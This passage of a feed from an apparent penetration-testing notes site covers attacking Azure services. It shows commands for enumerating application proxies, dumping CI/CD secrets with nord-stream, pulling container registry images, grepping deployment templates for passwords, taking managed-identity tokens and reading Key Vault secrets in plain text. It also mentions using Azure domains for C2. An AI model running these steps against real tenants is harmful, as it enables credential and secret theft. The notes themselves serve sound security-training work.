&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Enumerate applications that have Proxy&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Tools&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzureADApplication&lt;/span&gt; &lt;span class="n"&gt;-All&lt;/span&gt; &lt;span class="vm"&gt;$true&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="p"&gt;%{&lt;/span&gt;&lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="n"&gt;GetAzureADApplicationProxyApplication&lt;/span&gt; &lt;span class="n"&gt;-ObjectId&lt;/span&gt; &lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ObjectID&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;DisplayName&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;ObjectID&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="k"&gt;catch&lt;/span&gt;&lt;span class="p"&gt;{}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Tools&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzureADServicePrincipal&lt;/span&gt; &lt;span class="n"&gt;-All&lt;/span&gt; &lt;span class="vm"&gt;$true&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="p"&gt;?{&lt;/span&gt;&lt;span class="nv"&gt;$_&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;DisplayName&lt;/span&gt; &lt;span class="o"&gt;-eq&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Finance Management System&amp;#34;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Tools&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Tools&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;GetApplicationProxyAssignedUsersAndGroups&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;ps1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;Tools&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-ApplicationProxyAssignedUsersAndGroups&lt;/span&gt; &lt;span class="n"&gt;-ObjectId&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;OBJECT-ID&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.alteredsecurity.com/azureadlab"&gt;Training - Attacking and Defending Azure Lab - Altered Security&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Azure Services - Azure DevOps</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-devops/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-devops/</guid><description>&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/xforcered/ADOKit"&gt;xforcered/ADOKit&lt;/a&gt; - Azure DevOps Services Attack Toolkit&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/zolderio/devops"&gt;zolderio/devops&lt;/a&gt; - Azure DevOps Access Testing Scripts&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/synacktiv/nord-stream"&gt;synacktiv/nord-stream&lt;/a&gt; - Nord Stream is a tool that allows you to extract secrets stored inside CI/CD environments by deploying malicious pipelines. It currently supports Azure DevOps, GitHub and GitLab.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# List all secrets from all projects&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;nord-stream&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;devops&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-token&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&lt;/span&gt;&lt;span class="nv"&gt;$PAT&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-org&lt;/span&gt; &lt;span class="n"&gt;myorg&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-list-secrets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Dump all secrets from all projects&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="p"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;nord-stream&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;devops&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-token&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;&lt;/span&gt;&lt;span class="nv"&gt;$PAT&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-org&lt;/span&gt; &lt;span class="n"&gt;myorg&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="authentication" class="anchored-heading"&gt;Authentication&lt;a class="heading-anchor" href="#authentication" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;You can access an organization&amp;rsquo;s Azure DevOps Services instance via &amp;lt;https://dev.azure.com/{yourorganization}&amp;gt;.&lt;/p&gt;</description></item><item><title>Azure Services - Container Registry</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-container-registry/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-container-registry/</guid><description>&lt;h2 id="enumerate" class="anchored-heading"&gt;Enumerate&lt;a class="heading-anchor" href="#enumerate" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;List container registries in the subscription using Azure CLI&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;az&lt;/span&gt; &lt;span class="n"&gt;login&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="nv"&gt;@domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;onmicrosoft&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;com&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;az&lt;/span&gt; &lt;span class="n"&gt;acr&lt;/span&gt; &lt;span class="n"&gt;list&lt;/span&gt; &lt;span class="n"&gt;-o&lt;/span&gt; &lt;span class="n"&gt;table&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Login to the Registry&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;acr&lt;/span&gt;&lt;span class="p"&gt;=&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;ACRName&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="c"&gt;# from the previous command&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;server&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="vm"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;az&lt;/span&gt; &lt;span class="n"&gt;acr&lt;/span&gt; &lt;span class="n"&gt;login&lt;/span&gt; &lt;span class="n"&gt;-n&lt;/span&gt; &lt;span class="nv"&gt;$acr&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-expose-token&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-query&lt;/span&gt; &lt;span class="n"&gt;loginServer&lt;/span&gt; &lt;span class="n"&gt;-o&lt;/span&gt; &lt;span class="n"&gt;tsv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;token&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="vm"&gt;$&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;az&lt;/span&gt; &lt;span class="n"&gt;acr&lt;/span&gt; &lt;span class="n"&gt;login&lt;/span&gt; &lt;span class="n"&gt;-n&lt;/span&gt; &lt;span class="nv"&gt;$acr&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-expose-token&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-query&lt;/span&gt; &lt;span class="n"&gt;accessToken&lt;/span&gt; &lt;span class="n"&gt;-o&lt;/span&gt; &lt;span class="n"&gt;tsv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;docker&lt;/span&gt; &lt;span class="n"&gt;login&lt;/span&gt; &lt;span class="nv"&gt;$server&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="mf"&gt;00000000&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;0000&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;0000&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;0000&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;000000000000&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="nv"&gt;$token&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;List the images in the ACR&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;az&lt;/span&gt; &lt;span class="n"&gt;acr&lt;/span&gt; &lt;span class="n"&gt;repository&lt;/span&gt; &lt;span class="n"&gt;list&lt;/span&gt; &lt;span class="n"&gt;-n&lt;/span&gt; &lt;span class="nv"&gt;$acr&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;List version tags for an image&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;az&lt;/span&gt; &lt;span class="n"&gt;acr&lt;/span&gt; &lt;span class="n"&gt;repository&lt;/span&gt; &lt;span class="nb"&gt;show-tags&lt;/span&gt; &lt;span class="n"&gt;-n&lt;/span&gt; &lt;span class="nv"&gt;$acr&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-repository&lt;/span&gt; &lt;span class="n"&gt;mywebapp&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Connect to the container registry from a PowerShell console, set the $server and $token variables, and pull the image from the registry&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# docker login ${registryURI} --username ${username} --password ${password}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$token&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&amp;lt;AccessToken&amp;gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nv"&gt;$server&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&amp;lt;LoginServer&amp;gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;docker&lt;/span&gt; &lt;span class="n"&gt;login&lt;/span&gt; &lt;span class="nv"&gt;$server&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="mf"&gt;00000000&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;0000&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;0000&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;0000&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;000000000000&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="nv"&gt;$token&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;docker&lt;/span&gt; &lt;span class="n"&gt;pull&lt;/span&gt; &lt;span class="nv"&gt;$server&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;mywebapp&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;v1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;List docker containers inside a registry&lt;/p&gt;</description></item><item><title>Azure Services - Deployment Template</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-deployment-template/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-deployment-template/</guid><description>&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;List the deployments&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;Az&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzResourceGroup&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;Az&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzResourceGroupDeployment&lt;/span&gt; &lt;span class="n"&gt;-ResourceGroupName&lt;/span&gt; &lt;span class="n"&gt;SAP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Export the deployment template&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;Az&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Save-AzResourceGroupDeploymentTemplate&lt;/span&gt; &lt;span class="n"&gt;-ResourceGroupName&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;RESOURCE&lt;/span&gt; &lt;span class="n"&gt;GROUP&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;-DeploymentName&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;DEPLOYMENT&lt;/span&gt; &lt;span class="n"&gt;NAME&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# search for hardcoded password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;DEPLOYMENT&lt;/span&gt; &lt;span class="n"&gt;NAME&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;.&lt;/span&gt;&lt;span class="py"&gt;json&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;cat &lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;PATH&lt;/span&gt; &lt;span class="n"&gt;TO&lt;/span&gt; &lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;json&lt;/span&gt; &lt;span class="n"&gt;FILE&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="nb"&gt;Select-String&lt;/span&gt; &lt;span class="n"&gt;password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.alteredsecurity.com/azureadlab"&gt;Training - Attacking and Defending Azure Lab - Altered Security&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Azure Services - DNS Suffix</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-web-domains/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-web-domains/</guid><description>&lt;h2 id="dns-tables" class="anchored-heading"&gt;DNS Tables&lt;a class="heading-anchor" href="#dns-tables" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Many Azure services dynamically generate custom endpoints utilizing a trusted cloud suffix (such as &lt;code&gt;.cloudapp.azure.com&lt;/code&gt; or &lt;code&gt;.windows.net&lt;/code&gt;). Maintaining a structured inventory of these suffixes is critical for security auditing, zero-trust network design, and defensive threat research.&lt;/p&gt;
&lt;p&gt;These services can also be leveraged for domain fronting, subdomain takeover, or communication with an external C2 server when they are whitelisted by proxy or firewall rules.&lt;/p&gt;</description></item><item><title>Azure Services - KeyVault</title><link>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-keyvault/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cloud/azure/azure-services-keyvault/</guid><description>&lt;h2 id="access-token" class="anchored-heading"&gt;Access Token&lt;a class="heading-anchor" href="#access-token" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Keyvault access token&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;curl &lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt;&lt;span class="nv"&gt;$IDENTITY_ENDPOINT&lt;/span&gt;&lt;span class="s2"&gt;?resource=https://vault.azure.net&amp;amp;apiversion=2017-09-01&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-H&lt;/span&gt; &lt;span class="n"&gt;secret&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="nv"&gt;$IDENTITY_HEADER&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;curl &lt;/span&gt;&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt;&lt;span class="nv"&gt;$IDENTITY_ENDPOINT&lt;/span&gt;&lt;span class="s2"&gt;?resource=https://management.azure.com&amp;amp;apiversion=2017-09-01&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;-H&lt;/span&gt; &lt;span class="n"&gt;secret&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="nv"&gt;$IDENTITY_HEADER&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Connect with the access token&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;PS&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nv"&gt;$token&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;eyJ0..&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;PS&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nv"&gt;$keyvaulttoken&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;eyJ0..&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;PS&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nv"&gt;$accid&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;2e...bc&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;Az&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Connect-AzAccount&lt;/span&gt; &lt;span class="n"&gt;-AccessToken&lt;/span&gt; &lt;span class="nv"&gt;$token&lt;/span&gt; &lt;span class="n"&gt;-AccountId&lt;/span&gt; &lt;span class="nv"&gt;$accid&lt;/span&gt; &lt;span class="n"&gt;-KeyVaultAccessToken&lt;/span&gt; &lt;span class="nv"&gt;$keyvaulttoken&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="query-secrets" class="anchored-heading"&gt;Query Secrets&lt;a class="heading-anchor" href="#query-secrets" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Query the vault and the secrets&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;Az&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzKeyVault&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;Az&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzKeyVaultSecret&lt;/span&gt; &lt;span class="n"&gt;-VaultName&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;VaultName&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;Az&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Get-AzKeyVaultSecret&lt;/span&gt; &lt;span class="n"&gt;-VaultName&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;VaultName&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;-Name&lt;/span&gt; &lt;span class="n"&gt;Reader&lt;/span&gt; &lt;span class="n"&gt;-AsPlainText&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Extract secrets from Automations, AppServices and KeyVaults&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Import-Module&lt;/span&gt; &lt;span class="n"&gt;Microburst&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;psm1&lt;/span&gt;
